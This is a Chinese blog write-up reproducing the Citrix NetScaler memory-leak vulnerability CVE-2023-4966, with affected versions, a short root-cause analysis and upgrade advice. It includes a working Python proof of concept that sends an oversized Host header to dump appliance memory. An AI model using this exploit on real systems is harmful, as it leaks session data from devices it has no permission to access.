漏洞复现-Citrix 信息泄露漏洞分析(CVE-2023-4966)_cve-2023-4966 复现

于 2024-08-23 10:18:16 发布
阅读量654 收藏 7
点赞数 5
文章标签: 开发语言 自动驾驶 安全 人工智能 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baimao__Ch/article/details/141459053
版权

1.漏洞描述

Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰系统(Citrix Systems)公司的产品。

NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。

2.影响版本

  • NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
  • NetScaler ADC 13.1-FIPS < 13.1-37.164
  • NetScaler ADC 12.1-FIPS < 12.1-55.300
  • NetScaler ADC 12.1-NDcPP < 12.1-55.300

** 3.影响范围**

4.漏洞分析

这里以 13.0-47 的固件为例子, 从固件拉出 nsppe 这个程序,用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码:


snprintf函数被用于将hostname参数拼接到print\_temp\_rule变量中,并根据返回的长度,通过ns\_vpn\_send\_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。

snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果:


可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。


另外到达这个函数的路由,通过对这个函数 ns\_aaa\_oauth\_send\_openid\_config
 进行交叉引用一下子就看到了:


Poc:

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")

**5.**修复建议

  • 官方升级

目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:

https://www.citrix.com/downloads/citrix-gateway/

https://www.citrix.com/downloads/citrix-adc/

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

baimao__沧海
关注
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4478
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Citrix Endpoint Management 任意文件读取(CVE-2020-8209)复现
玄道的网安博客
11-19 555
漏洞描述 XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者 通过 发送特制HTTP请求,可以造成 读取受影响设备上任意文件 的影响。 影响版本 RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前.
Citrix修复位于Gateway 和 ADC 中的严重漏洞
smellycat000的专栏
11-10 847
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士周二,Citrix 称修复了影响 Gateway 和 ADC 产品中的三个漏洞,其中包括一个严重级别的漏洞。Ctrix Gateway 广泛部署在本地和云环境中,是一个SSL VPN 解决方案,负责应用和设备的单点登录。Citrix ADC(此前被称为NetScaler ADC)是一款应用交付和加载均衡解决方案,负责交付多个云环境中应用程序的可见...
【严重】Citrix ADC 和 Citrix Gateway 远程代码执行漏洞(PoC)
murphysec的博客
07-25 1616
Citrix ADC是应用程序交付和负载平衡解决方案,Citrix Gateway是一套安全的远程接入解决方案,常用于提供虚拟桌面和远程桌面服务,此外,Citrix ADC还被广泛用作Windows堡垒机。在 Citrix ADC 和 Citrix Gateway 受影响版本中,如果设备配置为网关(VPN 虚拟服务器、ICA 代理、CVPN、RDP 代理)或身份验证虚拟服务器。
再说“服务器上的安全数据库没有此工作站信任关系的计算机账户”问题
weixin_33834137的博客
08-12 3663
我之前写过一篇文章,说如何解决“服务器上的安全数据库没有此工作站信任关系的计算机账户”问题,前天我再次遇到了这个问题,我就照着那篇文章的方法操作,可以登陆到域,后来我开始安装SCVMM 2008 R2,遇到了问题,大概的意思是我没有完整的计算机名(我把DNS后缀清除了),无法安装,这下郁闷了,不过经过一天的努力,最后彻底的解决了这个问题 原因: 我先说...
IDEA DataGrip连接sqlserver 提示驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接的解决方法
qq_53058639的博客
02-23 939
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
网络安全入门笔记(共327页),助你步入安全门槛
Spontaneous_0的博客
01-31 827
网络安全入门笔记(共327页),助你步入安全门槛
解决关于“服务器上的安全数据库没有此工作站信任关系的计算机账户”
weixin_33885676的博客
09-25 3735
在2003AD迁移到08AD时,当08AD抢夺到主机角色改名重启之后,用域管理员登录时,却提示“服务器上的安全数据库没有此工作站信任关系的计算机账户”!!想了想原因,因为比较赶时间,所以没有等到源主机改名完成,就把目标主机的名称改成了源主机的名称。就相当于用同一名称入域造成的问题。解决方法:用本地管理员登陆进目标主机,点击计算机属性,消除掉计算机主DNS后缀。重启后,域管理员...
服务器上的安全数据库没有此工作站信任关系的计算机帐户。
dxaiofcu的专栏
12-12 6025
如题,之前遇到加域电脑登录时提示服务器上的安全数据库没有此工作站信任关系的计算机帐户。一般都是直接切本地管理员退域加域一条龙服务。最近发现可以这样操作,登录到域控服务器,打开AD directory用户和计算机,打开computers,找到对应的电脑,右键选择启用账户。
Citrix篇】1-Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
chen_yunan的博客
08-11 4086
Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6082
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4830
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
计算机上没有信任的用户,服务器上的安全数据库没有此工作站信任关系的计算机帐户...
weixin_39659837的博客
06-29 884
Log Name: SystemSource: NETLOGONDate: 1/3/2018 8:33:57 AMEvent ID: 5723Task Category: NoneLevel: ErrorKeywords: ClassicUser: N/AComputer: HACANECS...
域工作站提示“服务器上的安全数据库没有此工作站信任关系的计算机账户”的解决方案...
weixin_34357887的博客
02-07 5525
今天一用户告知他的电脑(系统是WIN7x32)无法使用域帐户登录到系统,提示“服务器上的安全数据库没有此攻占信任关系的计算机账户”。我不想通过退域再加域的方法来处理该问题。经过网上查询,发现有一个办法可以解决该问题。那就是用本地管理员账户登录,然后将该电脑隶属于的域名称的后缀删除掉,然后输入域管理员账户和密码确认该设置。重启后便可以使用域帐户登录系统。 转载于:ht...
漏洞复现-Metabase 远程代码执行漏洞(CVE-2023-38646)
最新发布
玄道的网安博客
08-12 1894
根据pyn3rd师傅分享的https://blog.pyn3rd.com/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/可以知道,可以通过以下三种方式攻击H2数据库。,按照官方预设的流程,一般来说其只能存在一次,在安装结束之后便会清除,但是官方完成安装后移除setup-token 这个重要的的操作给移除了。是Java中用于执行脚本的引擎,只要代码的最开头是 //javascript ,就会被认为是JavaScript脚本,并编译和执行。利用时不需要身份验证。
服务器上的安全数据库没有此工作站信任关系的计算机账户
热门推荐
任重道远
09-18 1万+
刚把电脑锁了一下 再打开的时候就登录不了了 提示 “服务器上的安全数据库没有此工作站信任关系的计算机账户” 原因:未知 解决: 拔掉网线后重启电脑就进来了
驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接的解决方法
2301_81034686的博客
06-23 2416
出现这种错误可能是因为你的驱动程序版本不兼容,我们可以尝试修改版本解决。而我们的驱动程序往往是以依赖的形式导入,因此可以在maven仓库查找你的数据库对应的驱动程序,选择一个数据库能够兼容的版本导入。在连接数据库的时候出现了下面图面中的错误,尝试集中方法后终于解决了这个问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值